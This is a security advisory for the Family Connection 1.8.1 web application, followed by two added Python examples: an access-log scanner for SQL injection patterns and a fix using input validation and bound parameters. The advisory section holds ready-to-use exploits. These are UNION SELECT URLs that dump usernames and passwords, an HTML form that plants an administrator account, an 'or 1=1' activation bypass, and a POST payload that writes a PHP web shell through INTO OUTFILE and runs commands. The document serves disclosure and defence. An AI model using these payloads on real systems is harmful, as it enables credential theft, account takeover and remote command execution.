Family Connection 1.8.1 SQL Injection

2009-03-30T00:00:00
ID PACKETSTORM:76175
Type packetstorm
Reporter Salvatore Fresta
Modified 2009-03-30T00:00:00

Description

                                        
                                            `******* Salvatore "drosophila" Fresta *******  
  
[+] Application: Family Connection  
[+] Version: 1.8.1  
[+] Website: http://www.familycms.com  
  
[+] Bugs: [A] Multiple SQL Injection  
[B] Create Admin User  
[C] Blind SQL Injection   
  
[+] Exploitation: Remote  
[+] Date: 25 Mar 2009  
  
[+] Discovered by: Salvatore "drosophila" Fresta  
[+] Author: Salvatore "drosophila" Fresta  
[+] Contact: e-mail: drosophilaxxx@gmail.com  
  
  
*************************************************  
  
[+] Menu  
  
1) Bugs  
2) Code  
3) Fix  
  
  
*************************************************  
  
[+] Bugs  
  
  
- [A] Multiple SQL Injection  
  
[-] Requisites: magic_quotes_gpc = on/off  
  
These bugs allow a registered user to view the  
username and password of every registered user.  
  
  
- [B] Create Admin User  
  
[-] Requisites: magic_quotes_gpc = off  
[-] File affected: register.php, activate.php  
  
This bug allows a guest to create an account with  
administrator privileges.  
  
  
- [C] Blind SQL Injection  
  
[-] Requisites: magic_quotes_gpc = off  
[-] File affected: lostpw.php  
  
  
*************************************************  
  
[+] Code  
  
  
- [A] Multiple SQL Injection  
  
http://www.site.com/path/addressbook.php?letter=-1%25' UNION ALL SELECT 1,2,NULL,username,5,password,email FROM fcms_users%23  
  
http://www.site.com/path/recipes.php?category=1&id=1 UNION SELECT 1,2,username,password,5,6 FROM fcms_users  
  
http://www.site.com/path/home.php?poll_id=-1 UNION ALL SELECT 1,NULL,3,CONCAT(username, 0x3a, password) FROM fcms_users%23  
  
  
- [B] Create Admin User  
  
<html>  
<head>  
<title>Family Connection 1.8.1 Create Admin User Exploit</title>  
</head>  
<body>  
<p>This exploit creates a user with administrator privileges using the following information:<br>  
Username: root<br>  
Password: toor<br>  
<form action="http://localhost/fcms/register.php" method="POST">  
<input type="hidden" name="username" value="blabla">  
<input type="hidden" name="password" value="blabla">  
<input type="hidden" name="email" value="blabla@blabla.blabla">  
<input type="hidden" name="fname" value="blabla">  
<input type="hidden" name="lname" value="blabla">  
<input type="hidden" name="year" value="00-00-000','fakeuser','fakepassword'), (1, NOW(), 'root', 'root', 'root@owned.com', '00-00-00', 'root', '7b24afc8bc80e548d66c4e7ff72171c5')#'">  
<input type="submit" name="submit" value="Exploit">  
</form>  
</body>  
</html>  
  
To activate accounts:  
  
http://www.site.com/path/activate.php?uid=1 or 1=1&code=  
  
  
- [C] Blind SQL Injection  
  
POST /path/lostpw.php HTTP/1.1  
Host: www.site.com  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 193  
  
email=-1' UNION ALL SELECT '<?php echo "<pre>"; system($_GET[cmd]); echo "</pre><br><br>";?>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 INTO OUTFILE '/var/www/htdocs/path/rce.php'#  
  
To execute commands:  
  
http://www.site.com/path/rce.php?cmd=ls  
  
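An added example, not part of the advisory, showing how a defender would spot the request shapes listed above in web server access logs: a UNION ... SELECT or INTO OUTFILE keyword in a percent-decoded query string, an OR n=n tautology, a SQL comment terminator, or a non-numeric value in a parameter the application uses as an id. The log lines are constructed; the script paths (addressbook.php, activate.php, home.php, lostpw.php) and parameter names (letter, uid, poll_id) are the ones this advisory names. The lostpw.php vector travels in a POST body, which a standard access log never records, so the same rules are exposed as scan_text for bodies captured by a WAF or application-level log.

```python
"""Scan access-log lines for the SQL injection request shapes described in
the Family Connection 1.8.1 advisory. Constructed example; not advisory code."""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in Apache combined-style format (not real traffic).
# Paths and parameter names are those named in the advisory.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Mar/2009:10:00:01 +0000] "GET /fcms/addressbook.php?letter=A HTTP/1.1" 200 5120
203.0.113.5 - - [25/Mar/2009:10:00:09 +0000] "GET /fcms/addressbook.php?letter=-1%25'%20UNION%20ALL%20SELECT%201,2,NULL,username,5,password,email%20FROM%20fcms_users%23 HTTP/1.1" 200 7310
203.0.113.5 - - [25/Mar/2009:10:01:12 +0000] "GET /fcms/activate.php?uid=1%20or%201=1&code= HTTP/1.1" 200 410
203.0.113.5 - - [25/Mar/2009:10:02:30 +0000] "POST /fcms/lostpw.php HTTP/1.1" 200 210
198.51.100.7 - - [25/Mar/2009:10:03:00 +0000] "GET /fcms/home.php?poll_id=3 HTTP/1.1" 200 9000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Each rule is applied to the percent-decoded, lower-cased parameter string.
RULES = [
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("into-outfile", re.compile(r"\binto\s+(out|dump)file\b")),
    ("tautology", re.compile(r"\bor\s+\d+\s*=\s*\d+\b")),
    ("comment-terminator", re.compile(r"#|--\s|/\*")),
]

# Parameters the application treats as numeric ids; a non-numeric value is
# a cheap, high-signal check on its own (assumed from the advisory's URLs).
INT_PARAMS = {"uid", "id", "poll_id"}


def scan_params(pairs):
    """Return the names of the rules that fire on a list of (key, value) pairs."""
    reasons = []
    flat = "&".join(f"{k}={v}" for k, v in pairs).lower()
    for name, pat in RULES:
        if pat.search(flat):
            reasons.append(name)
    for key, val in pairs:
        if key in INT_PARAMS and not val.isdigit():
            reasons.append(f"non-integer {key}")
    return reasons


def scan_text(body):
    """Scan a form body (e.g. from a WAF or application log); decoded once here."""
    return scan_params(parse_qsl(body, keep_blank_values=True))


def scan_log(text):
    """Return one hit dict per access-log line whose query string trips a rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        reasons = scan_params(parse_qsl(parts.query, keep_blank_values=True))
        if reasons:
            hits.append({"ip": m.group("ip"), "path": parts.path, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(h["ip"], h["path"], ", ".join(h["reasons"]))
```

Running the block prints two hits from the sample: the addressbook.php request (union-select, comment-terminator) and the activate.php request (tautology, non-integer uid). The benign requests and the POST to lostpw.php produce nothing, which is the point of the usage note: for the POST vector you need body logging, not just the access log.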
  
*************************************************  
  
[+] Fix  
  
No fix.  
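
The advisory ships no fix, so here is an added example, not from the advisory or the Family Connection project, of the two controls that close all three bugs independently of the magic_quotes_gpc setting: validate each parameter's type (a single letter for letter, digits only for uid, a non-empty activation code) and bind user input as query parameters instead of splicing it into SQL. It uses Python's sqlite3 against an in-memory table called fcms_users (the table name from the advisory; the column layout and the sample rows are assumed, with placeholder password hashes). The real application is PHP on MySQL, where PDO or mysqli prepared statements behave the same way.

```python
"""Parameter validation plus bound query parameters: the fix the advisory lacks.
Constructed example on sqlite3; not Family Connection code. Column names and
sample rows are assumptions."""
import re
import sqlite3

# Constructed rows with placeholder hashes (a real deployment stores a slow,
# salted password hash, never an unsalted MD5).
SAMPLE_USERS = [
    ("alice", "HASH_PLACEHOLDER_1", "Anderson", 1, ""),
    ("bob", "HASH_PLACEHOLDER_2", "Brown", 0, "abc123"),
]


def make_db():
    """In-memory table using the advisory's table name; columns are assumed."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE fcms_users (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, lname TEXT, activated INTEGER, code TEXT)"
    )
    con.executemany(
        "INSERT INTO fcms_users (username, password, lname, activated, code) "
        "VALUES (?, ?, ?, ?, ?)",
        SAMPLE_USERS,
    )
    return con


def is_valid_letter(letter):
    """addressbook-style parameter: exactly one ASCII letter, nothing else."""
    return re.fullmatch(r"[A-Za-z]", letter) is not None


def names_by_letter(con, letter):
    """Whitelisted input plus a bound parameter; the LIKE pattern is built here."""
    if not is_valid_letter(letter):
        raise ValueError("letter must be a single ASCII letter")
    rows = con.execute(
        "SELECT username FROM fcms_users WHERE lname LIKE ? ORDER BY username",
        (letter + "%",),
    )
    return [r[0] for r in rows]


def _escape_like(s):
    """Escape LIKE metacharacters so user text cannot widen the match."""
    return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_lname(con, fragment):
    """Free-text prefix search: the input is data, not SQL, and its wildcards
    are escaped. The advisory's UNION payload simply matches no surname."""
    rows = con.execute(
        "SELECT username FROM fcms_users WHERE lname LIKE ? ESCAPE '\\' "
        "ORDER BY username",
        (_escape_like(fragment) + "%",),
    )
    return [r[0] for r in rows]


def activate(con, uid, code):
    """activate.php-style flow: uid must be all digits, code must be non-empty,
    both are bound, and an already-active account cannot be re-activated."""
    if not re.fullmatch(r"\d+", uid) or not code:
        return False
    cur = con.execute(
        "UPDATE fcms_users SET activated = 1 "
        "WHERE id = ? AND code = ? AND activated = 0",
        (int(uid), code),
    )
    con.commit()
    return cur.rowcount == 1


if __name__ == "__main__":
    db = make_db()
    print(names_by_letter(db, "A"))
    print(search_lname(db, "Br"))
    print(activate(db, "1 or 1=1", ""), activate(db, "2", "abc123"))
```

The empty-code check matters on its own: the advisory's activation URL sends code= with no value, and a comparison against an empty stored code would otherwise succeed even with the id properly bound.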
  
  
*************************************************  